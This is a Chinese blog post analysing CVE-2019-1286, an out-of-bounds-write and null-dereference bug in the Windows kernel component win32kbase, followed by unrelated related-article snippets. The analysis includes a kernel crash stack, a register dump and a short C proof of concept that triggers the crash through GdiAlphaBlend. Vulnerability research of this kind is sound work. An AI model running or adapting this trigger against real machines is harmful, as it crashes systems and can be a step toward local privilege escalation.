CVE-2019-1286漏洞分析

时间：2022-10-17 15:26:22浏览次数：59

标签：1286 r1 r3 0x0 0000000000000000 漏洞 2019 ulGetNearestIndexFromColorref CVE

0x00漏洞信息

漏洞影响：本地提权

漏洞文件：win32kbase.sys

漏洞函数：ulGetNearestIndexFromColorref

漏洞原因：越界写

0x01漏洞分析

由于空指针取消引用，此崩溃发生在 win32kbase!ulGetNearestIndexFromColorref+0x6f
我们知道这个 Null 指针可以用作 Windows 7 内核的内存泄漏
- 我们知道这个指针稍后会在从函数 XEPALOBJ::ulGetNearestFromPalentryNoExactMatc 返回到 win32kfull!CreateXlateObject 后使用，这可能导致越界写入

崩溃时的堆栈：

nt!DbgBreakPointWithStatus
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x952
nt!KeBugCheckEx+0x107
nt!KiBugCheckDispatch+0x69
nt!KiSystemServiceHandler+0x7c
nt!RtlpExecuteHandlerForException+0xf
nt!RtlDispatchException+0x4a5
nt!KiDispatchException+0x16e
nt!KiExceptionDispatch+0x11d
nt!KiPageFault+0x43f
win32kbase!ulGetNearestIndexFromColorref+0x6f
win32kfull!CreateXlateObject+0x1f0
win32kfull!EXLATEOBJ::bInitXlateObj+0x1b1
win32kfull!NtGdiAlphaBlend+0x11ea03
nt!KiSystemServiceCopyEnd+0x25
win32u!NtGdiAlphaBlend+0x14
gdi32full!GdiAlphaBlend+0xd0

崩溃时寄存器：

rax=0000000000000000 rbx=0000000000000001 rcx=000000000000ffff
rdx=0000000000000000 rsi=ffffb4846f7b4da0 rdi=00000000ffffffff
rip=ffffb1cc4763d81f rsp=ffff9889380b2360 rbp=ffff9889380b2390
r8=00000000ffffffff r9=0000000000000001 r10=0000000000000001
r11=0000000000000000 r12=0000000000000000 r13=0000000000000208
r14=ffffb18182d72cc4 r15=ffffb18182d72c70
iopl=0 nv up ei pl zr na po cy
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050247
win32kbase!ulGetNearestIndexFromColorref+0x6f:
ffffb1cc`4763d81f 3b4a1c cmp ecx,dword ptr [rdx+1Ch] ds:002b:00000000`0000001c=????????

0x02poc

#include <windows.h>
#include <stdio.h>

int main()
{
    BLENDFUNCTION fn = { 0 };
    HDC r0 = CreateCompatibleDC(0x0);
    HDC r1 = CreateCompatibleDC(0x0);
    HBITMAP r2 = CreateCompatibleBitmap(r0, 0x40, 0x4);
    SelectObject(r1, r2); // NtGdiSelectBitmap
    HDC r3 = CreateCompatibleDC(0x0);
    SetLayout(r1, 0xa);
    SetBkColor(r3, 0xffffffff);
    HBITMAP r4 = CreateCompatibleBitmap(r0, 0x800004, 0x2);
    SelectObject(r3, r4); // NtGdiSelectBitmap
    __debugbreak();
    GdiAlphaBlend(r1, 0x0, 0x0, 0x2, 0x2, r3, 0x0, 0x0, 0x80000000000bf67, 0x800000001, fn);
    return 0;
}

标签：1286,r1,r3,0x0,0000000000000000,漏洞,2019,ulGetNearestIndexFromColorref,CVE
From： https://www.cnblogs.com/feizianquan/p/16799281.html

数据集 | 2001-2019年中国商品零售价格指数数据集
下载数据集请登录爱数科商品零售价格指数（RPI）是指反映一定时期内商品零售价格变动趋势和变动程度的相对数（基准值为100），涵盖食品、饮料烟酒、服装鞋帽、纺织品、中西药品、化......
luogu P5339 [TJOI2019]唱、跳、rap和篮球 (容斥，指数型母函数，NTT)
https://www.luogu.com.cn/problem/P5339要求不含1234的方案，反过来求含至少一个1234的方案。钦定存在i个位置有1234，位置的方案是Cn-3i,i.其他n-4i个位置的方案是多重集......
VS2019中文输出乱码解决方法（C语言）
现象：VS2019控制台输出中文乱码第一种解决方法：安装插件FormatonSave重启VS2019生效（！！！注意：别装错了，刚开始我就装错了这个UTF-8（NoBOM），装了这个插件的同学，记......
Apache Commons Text远程代码执行漏洞(CVE-2022-42889)分析
漏洞介绍根据apache官方给出的说明介绍到ApacheCommonsText执行变量插值，允许动态评估和扩展属性的一款工具包，插值的标准格式是"${prefix:name}"，其中"prefix"是用于定位o......
Apache Tomcat文件包含漏洞(CVE-2020-1938)复现
漏洞描述：ApacheTomcat是美国阿帕奇（Apache）软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServerPage（JSP）的支持。TomcatAJP协议由于存在实现缺陷导......
OneNote 2019 右键菜单卡顿
1.在Windows10中的右下角，右键点击`输入法`（即点击`中`或`英`的图标）2.选择`设置`3.选择`常规`4.界面滑到最下面，开启`使用以前的微软拼音输入法` 问题解决，On......
2019再见，2020你好
2019年，你一共写了30万行梯形图你热衷于使用组合键Ctrl+C以及Ctrl+V喜欢和客户讨论你们两个都不懂的技术知识你热爱学习每天你会打开剑控微信群假装了解最新技术2019年，......
CVE-2022-22965漏洞分析
ASpringMVCorSpringWebFluxapplicationrunningonJDK9+maybevulnerabletoremotecodeexecution(RCE)viadatabinding.Thespecificexploitrequires......
老司机学swoole之基础进阶篇（进程篇）2019年swoole基础进阶之进程篇
0资料收集视频地址https://www.bilibili.com/video/BV1oJ411U7bc/?vd_source=4a69745b599dffec877b0fcfe130b0921设置自定义进程名称2创建第一个子进程、获取子进程......
【人脸表情识别】不得不读的重要论文推荐（2019-2020篇）
上一篇专栏文章我们介绍了2015-2018年基于图片的人脸表情识别代表性方法。本文将延续上一篇的内容，继续盘点2019-2020基于图片的人脸表情识别的代表性工作。作者&编辑|Menp......

CVE-2019-1286漏洞分析

0x00漏洞信息

0x01漏洞分析

0x02poc

相关文章

赞助商

阅读排行